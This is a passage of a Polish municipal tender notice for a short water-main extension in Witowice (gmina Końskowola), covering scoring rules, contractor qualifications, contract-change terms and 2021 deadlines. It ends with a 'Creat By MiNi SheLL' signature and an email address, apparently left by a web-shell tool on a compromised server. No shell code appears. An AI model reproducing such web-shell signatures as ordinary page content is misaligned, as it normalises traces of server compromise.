obliczania punktów dla kryterium ceny :Poszczególny ofertom zostaną przyznane punkty za cenę obliczone wg<br/>poniższego wzoru:Cena oferty- max 60 pkt C = cena brutto oferty z najniższą ceną/cena<br/>brutto oferty badanej x 60 pkt Sposób obliczania punktów dla kryterium gwarancja: Poszczególnym<br/>ofertom zostaną przyznane punkty za długość okresu gwarancji z zastrzeżeniem że okres gwarancji<br/>nie może być krótszy niż 60 m-cy. Zamawiający informuje, iż poszczególnym ofertom zostaną<br/>przyznane punkty za długość okresu gwarancji z zastrzeżeniem, że jeżeli Wykonawca wskaże okres<br/>gwarancji krótszy niż60 m-cy, Zamawiający odrzuci ofertę Wykonawcy. Jeżeli Wykonawca nie wpisze<br/>okresu gwarancji to będzie to równoznaczne z zaoferowaniem okresu gwarancji 60 miesięcy i w takiej<br/>sytuacji Wykonawca nie otrzyma punktów w opisanym kryterium. W zawartej umowie zostanie wpisany<br/>okres gwarancji na podstawie informacji uzyskanych z formularza ofertowego.Punkty zostaną<br/>przyznane wg poniższego schematu:  60-66 miesięcy 0 pkt 67- 73 miesięcy 20 pkt 74 -80 miesięcy 40<br/>pkt Punkty zostaną przyznane na podstawie informacji zawartych w formularzu ofertowym. Kryterium<br/>gwarancja oceniany będzie na podstawie zadeklarowanego przez Wykonawcę okresu gwarancji<br/>(wyrażonego w pełnych miesiącach). Ostateczna ilość punktów dla każdej z ofert zostanie obliczona<br/>wg następującego wzoru:Łączna ilość punktów = C+G Maksymalnie oferta może otrzymać 100<br/>punktów.Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria<br/>oceny ofert. Oferta wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę<br/>punktów. Pozostałym ofertom, wypełniającym wymagania kryterialne przypisana zostanie<br/>proporcjonalnie mniejsza liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/>Punkty będą liczone z dokładnością do dwóch miejsc po przecinku, zgodnie z regułą matematyczną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III. Rozbudowa sieci wodociągowej w m. Witowice.<br/>Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu sieci wodociągowych w msc. Witowice gm. Końskowola<br/>Zadanie polega na wykonaniu:<br/>- Sieci wodociągowej DN50 PE100 SDR17 (63x3,8) o długości – 113,2 m<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w dokumentacji stanowiącej załącznik nr 1C do SWZ. Zamawiający informuje, że przedmiar robót udostępniony w załączniku nr 1C do SWZ ma charakter pomocniczy dla sporządzenia oferty. Wykonawca zobowiązany jest w ofercie uwzględnić wszystkie roboty zawarte w dokumentacji projektowej niezbędne do wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami. Przedmiar robót nie stanowi podstawy do wyceny ofert. <br/>Wykonawca we własnym zakresie wykona odpowiednie zabezpieczenia i oznakowania robót.<br/>Przy realizacji zamówienia wykonawca może zastosować materiały lub urządzenia dowolnego producenta pod warunkiem, że materiały te i urządzenia posiadają parametry nie gorsze od opisanych w dokumentacji stanowiącej za łącznik nr 1C do SWZ.<br/>W przypadku niezgodności pomiędzy poszczególnymi elementami dokumentacji technicznej stanowiącymi załącznik nr 1C do SWZ, Zamawiający prosi o ich wskazywanie na etapie przed terminem składania ofert, aby Zamawiający mógł dokonać ich interpretacji w formie odpowiedzi na pytania. Po zawarciu umowy, w przypadku pojawienia się w/w rozbieżności, Zamawiający będzie dokonywał ich interpretacji na bieżąco, bez możliwości podwyższenia wynagrodzenia ryczałtowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu, Zamawiający, przy wyborze oferty<br/>najkorzystniejszej zastosuje kryterium:1) Cena [C] 60% 2) Gwarancja [G] 40%2. Sposób obliczania punktów dla kryterium ceny :Poszczególny ofertom zostaną przyznane punkty za cenę obliczone wg<br/>poniższego wzoru:Cena oferty- max 60 pkt C = cena brutto oferty z najniższą ceną/cena<br/>brutto oferty badanej x 60 pkt Sposób obliczania punktów dla kryterium gwarancja: Poszczególnym<br/>ofertom zostaną przyznane punkty za długość okresu gwarancji z zastrzeżeniem że okres gwarancji<br/>nie może być krótszy niż 60 m-cy. Zamawiający informuje, iż poszczególnym ofertom zostaną<br/>przyznane punkty za długość okresu gwarancji z zastrzeżeniem, że jeżeli Wykonawca wskaże okres<br/>gwarancji krótszy niż60 m-cy, Zamawiający odrzuci ofertę Wykonawcy. Jeżeli Wykonawca nie wpisze<br/>okresu gwarancji to będzie to równoznaczne z zaoferowaniem okresu gwarancji 60 miesięcy i w takiej<br/>sytuacji Wykonawca nie otrzyma punktów w opisanym kryterium. W zawartej umowie zostanie wpisany<br/>okres gwarancji na podstawie informacji uzyskanych z formularza ofertowego.Punkty zostaną<br/>przyznane wg poniższego schematu:  60-66 miesięcy 0 pkt 67- 73 miesięcy 20 pkt 74 -80 miesięcy 40<br/>pkt Punkty zostaną przyznane na podstawie informacji zawartych w formularzu ofertowym. Kryterium<br/>gwarancja oceniany będzie na podstawie zadeklarowanego przez Wykonawcę okresu gwarancji<br/>(wyrażonego w pełnych miesiącach). Ostateczna ilość punktów dla każdej z ofert zostanie obliczona<br/>wg następującego wzoru:Łączna ilość punktów = C+G Maksymalnie oferta może otrzymać 100<br/>punktów.Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria<br/>oceny ofert. Oferta wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę<br/>punktów. Pozostałym ofertom, wypełniającym wymagania kryterialne przypisana zostanie<br/>proporcjonalnie mniejsza liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/>Punkty będą liczone z dokładnością do dwóch miejsc po przecinku, zgodnie z regułą matematyczną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Część I:<br/>Zdolności technicznej lub zawodowej. <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca ubiegający się o udzielenie zamówienia wykaże:<br/>- Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych polegających na budowie przyłączy kanalizacji sanitarnej o wartości co najmniej 35 000,00 zł brutto każda<br/>- Dysponowanie co najmniej jedną osobą, pełniącą funkcje kierownika budowy posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności sanitarnej z co najmniej 3-letnim doświadczeniem jako kierownik budowy lub kierownik robót - liczonym od dnia uzyskania uprawnień.<br/>część II: <br/>h.	Zdolności technicznej lub zawodowej. <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca ubiegający się o udzielenie zamówienia wykaże:<br/><br/>	Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 roboty budowlanej polegającej na budowie/przebudowie sieci kanalizacji sanitarnej o wartości co najmniej 150 000,00 zł brutto oraz 1 roboty budowlanej polegającej na budowie/przebudowie sieci wodociągowej o wartości co najmniej 90 000,00 zł brutto <br/>	Dysponowanie co najmniej jedną osobą, pełniącą funkcje Kierownika budowy posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności sanitarnej z co najmniej 3-letnim doświadczeniem jako kierownik budowy lub kierownik robót - liczonym od dnia uzyskania uprawnień.<br/><br/>Część III:<br/>l.	Zdolności technicznej lub zawodowej. <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca ubiegający się o udzielenie zamówienia wykaże:<br/><br/>	Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych polegających na budowie/ przebudowie sieci wodociągowej o wartości co najmniej 35 000,00 zł brutto każda<br/>	Dysponowanie co najmniej jedną osobą, pełniącą funkcje Kierownika budowy posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności sanitarnej z co najmniej 3-letnim doświadczeniem jako kierownik budowy lub kierownik robót - liczonym od dnia uzyskania uprawnień. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający w żadnej części nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	potwierdzających spełnienie warunków udziału w postępowaniu w części I, części II, części III:<br/><br/>	Wykaz robot budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie - według wzoru stanowiącego załącznik nr 6 do SWZ.<br/><br/>	Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami według wzoru stanowiącego załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Przed zawarciem umowy w każdej części zamówienia Zamawiający żąda aby wykonawca złożył dokumenty dotyczące uprawnień Kierownika Budowy/ Robót (poświadczone za zgodność z oryginałem decyzje o nadaniu uprawnień, oraz informacje o przynależności do Izby Inżynierów Budownictwa).<br/>Przed zawarciem umowy Zamawiająca zobowiązany jest do złożenia kosztorysów sporządzonych zgodnie z przedmiarami robót, znajdującymi się w zał. Nr 1 do SWZ. Kosztorysy mają charakter pomocniczy, ich zadaniem jest ułatwienie wykonawcy rozpoznania zakresu umowy i skalkulowania na własną odpowiedzialność i ryzyko – ceny oferty. Wykonawcy nie<br/>służą żadne roszczenia wobec Zamawiającego w przypadku stwierdzenia niedoszacowania, przeszacowania, pominięcia lub innych błędów w kosztorysie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Umocowanie Pełnomocnika musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą. Pełnomocnictwo powinno<br/>jednoznacznie określać postępowanie i precyzować zakres umocowania, musi też wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie. Na dokumencie pełnomocnictwa, w imieniu poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, muszą podpisać się osoby, które są uprawnione do działania w imieniu<br/>poszczególnych Wykonawców. Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za<br/>zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, oświadczenia o których mowa w art. 125 ust. 1 ustawy pzp składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonują poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z<br/>zachowaniem formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający, poza przypadkami określonymi w art. 455 ustawy pzp, dopuszcza możliwość<br/>zmian umowy w zakresie dotyczącym:<br/>1) terminu wykonania przedmiotu umowy w przypadkach:<br/>a) gdy zaistnieją okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w<br/>chwili zawarcia umowy, pod warunkiem, że zmiana ta sprzyjać będzie należytemu wykonaniu<br/>zamówienia, jak również oszczędnemu, celowemu i gospodarnemu wydatkowaniu środków<br/>publicznych,<br/>b) gdy wprowadzenie zmian jest korzystne dla Zamawiającego,<br/>c) gdy wystąpią zdarzenia losowe: klęska, akt terroru, katastrofa, załamanie gospodarcze,<br/>d) konieczności wprowadzenia zmian w dokumentacji projektowej,<br/>e) konieczności wprowadzenia zmian w zakresie realizacji umowy z uwagi na interes<br/>Zamawiającego (np. roboty zamienne, nowsza, korzystniejsza technologia),<br/>f) zaistnienia niesprzyjających, obiektywnych warunków klimatycznych uniemożliwiających<br/>wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, potwierdzonych<br/>przez Inspektora nadzoru,<br/>g) gdy wystąpią warunki geologiczne, terenowe, archeologiczne, i wodne nie ujawnione w<br/>dokumentacji technicznej a utrudniające wykonanie umowy,<br/>h) wstrzymania prac budowlanych przez właściwy organ z przyczyn niezawinionych przez<br/>Wykonawcę,<br/>i) w przypadku wystąpienia opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień itp. do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, gdy opóźnienie<br/>przekroczy okres przewidziany w przepisach prawa w którym decyzje te powinny zostać wydane<br/>oraz nie są następstwem okoliczności za które Wykonawca ponosi odpowiedzialność<br/>j) wystąpienia siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym,<br/>występujące po zawarciu niniejszej umowy, a których Strony nie były w stanie przewidzieć w<br/>momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie niniejszej<br/>umowy zgodnie z jej treścią,<br/>k) wystąpienia innych okoliczności nie powstałych z winy Wykonawcy, za które<br/>odpowiedzialność ponosi Zamawiający,<br/>2) osób funkcyjnych wskazanych w niniejszej umowie ze strony Zamawiającego jak i<br/>Wykonawcy, o uprawnieniach wymaganych przez Zamawiającego dla tego zadania (zmiana jest<br/>możliwa na osoby spełniające wymogi SWZ),<br/>3) wykonania robót zamiennych lub robót w nowszej technologii w stosunku do zaprojektowanej<br/>a pozwalających na zaoszczędzenie czasu, kosztów realizacji przedmiotu umowy lub kosztów<br/>eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót,<br/>4) robót budowlanych nie objętych niniejszą umową, w szczególności nie ujętych w projekcie<br/>budowlano - wykonawczym, które nie były możliwe do przewidzenia w chwili wszczęcia<br/>postępowania o udzielenie zamówienia publicznego, w wyniku którego doszło do zawarcia<br/>umowy, a które są konieczne do realizacji przedmiotu umowy, gdy z przyczyn technicznych lub<br/>ekonomicznych powierzenie wykonania robót innemu wykonawcy nie jest możliwe, a oddzielenie<br/>wykonania tych robót od przedmiotu umowy wymagałoby poniesienia niewspółmiernie wysokich<br/>kosztów oraz spowodowałoby istotną niedogodność dla zamawiającego– co zostanie<br/>poprzedzone sporządzeniem Protokołu konieczności wykonania tych robót. Wartość każdej<br/>kolejnej zmiany umowy nie może przekroczyć 50% wartości. Konieczność wykonania robot<br/>zamiennych lub zamówienia dodatkowego musi być potwierdzona w protokole konieczności<br/>wykonania robot wraz z uzasadnieniem, wystawionym przez Wykonawcę, zarekomendowanym<br/>przez Inspektora Nadzoru i zaakceptowanym przez Zamawiającego. Bez uprzedniej zgody<br/>Zamawiającego wykonywane mogą być jedynie prace niezbędne ze względu na bezpieczeństwo<br/>lub konieczność zapobieżenia awarii.<br/>5) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy.<br/>Cd. zmian umowy zawarto we wzorze umowy stanowiącym załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gminakonskowola. ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-22 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com